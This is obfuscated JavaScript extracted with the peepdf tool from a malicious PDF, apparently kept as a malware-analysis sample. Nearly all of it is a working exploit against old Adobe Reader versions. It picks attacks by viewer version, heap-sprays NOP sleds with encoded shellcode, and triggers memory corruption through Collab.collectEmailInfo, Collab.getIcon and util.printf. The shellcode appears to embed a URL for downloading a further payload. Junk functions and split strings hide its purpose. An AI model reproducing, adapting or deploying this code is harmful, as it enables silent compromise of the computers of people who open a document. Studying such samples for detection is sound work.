// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%u', '4343%u', '4343%', 'u0FEB%u3', '35B%u66C', '9%u80B', '9%u8001%', 'uEF33%uE', '243%uEBF', 'A%uE805%', 'uFFEC', '%uFFFF%', 'u8B7F', '%uDF4E%u', 'EFEF%u6', '4EF%uE3A', 'F%u9F', '64%u42F3', '%u9F64', '%u6EE7%', 'uEF03', '%uEFE', 'B%u64EF', '%uB90', '3%u61', '87%uE1', 'A1%u0703', '%uEF11', '%uEFEF%', 'uAA66%', 'uB9EB%u', '7787%', 'u6511%u0', '7E1%uEF', '1F%uEF', 'EF%uA', 'A66%uB', '9E7%u', 'CA87%u1', '05F%u0', '72D%u', 'EF0D%u', 'EFEF%uAA', '66%uB9', 'E3%u0087', '%u0F21', '%u078F%', 'uEF3B%uE', 'FEF%uAA', '66%uB', '9FF%u2E8', '7%u0A96', '%u075', '7%uEF29%', 'uEFEF', '%uAA6', '6%uAFFB%', 'uD76F%u', '9A2C%u', '6615%', 'uF7AA%', 'uE806%uE', 'FEE%uB', '1EF%u', '9A66%u', '64CB%', 'uEBAA%u', 'EE85%u', '64B6%uF', '7BA%u0', '7B9%uEF6', '4%uEFE', 'F%u87BF', '%uF5D', '9%u9FC0%', 'u7807%', 'uEFEF', '%u66EF', '%uF3A', 'A%u2A64%', 'u2F6C%u', '66BF%u', 'CFAA%u1', '087%uEF', 'EF%uBFE', 'F%uAA64%', 'u85FB%', 'uB6ED%uB', 'A64%u0', '7F7%u', 'EF8E%u', 'EFEF%', 'uAAEC', '%u28C', 'F%uB3EF%', 'uC191%', 'u288A%uE', 'BAF%u8A9', '7%uEFE', 'F%u9A10%', 'u64CF%u', 'E3AA%uE', 'E85%u64', 'B6%uF7', 'BA%uA', 'F07%uE', 'FEF%u85', 'EF%uB', '7E8%uAA', 'EC%uDC', 'CB%uBC3', '4%u10B', 'C%uCF9A%', 'uBCBF%', 'uAA64', '%u85F3', '%uB6EA%', 'uBA64%u', '07F7%uE', 'FCC%uEF', 'EF%uEF85', '%u9A10', '%u64CF%', 'uE7AA%uE', 'D85%u64B', '6%uF7BA%', 'uFF07%uE', 'FEF%u8', '5EF%u641', '0%uFFAA', '%uEE85%u', '64B6%uF7', 'BA%uEF0', '7%uEF', 'EF%uAEE', 'F%uBDB', '4%u0EEC', '%u0EE', 'C%u0E', 'EC%u0', 'EEC%u0', '36C%uB5', 'EB%u6', '4BC%u0D', '35%uBD', '18%u0F', '10%u64BA', '%u6403', '%uE79', '2%uB264%', 'uB9E3%u', '9C64%u6', '4D3%u', 'F19B%', 'uEC97', '%uB91', 'C%u996', '4%uEC', 'CF%uDC', '1C%uA626', '%u42AE%', 'u2CEC%', 'uDCB9%u', 'E019%', 'uFF51', '%u1DD5%', 'uE79B%u', '212E%', 'uECE2', '%uAF1D%u', '1E04%u', '11D4%u9A', 'B1%uB', '50A%u', '0464%uB', '564%u', 'ECCB%u89', '32%uE36', '4%u64A4%', 'uF3B5', '%u32EC%', 'uEB64%u', 'EC64%uB', '12A%u2', 'DB2%uE', 'FE7%u1B', '07%u101', '1%uBA10%', 'uA3BD%uA', '0A2%uEFA', '1%u7468', '%u7074', '%u2F3', 'A%u64', '2F%u6769', '%u7469%u', '6C61%u7', '02D%u72', '6C%u63', '2E%u6', 'D6F%u6', '62F%u61', '6C%u6873', '%u652F', '%u657', '8%u702E%', 'u7068%u7', '83F%u703', 'D%u66', '64');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

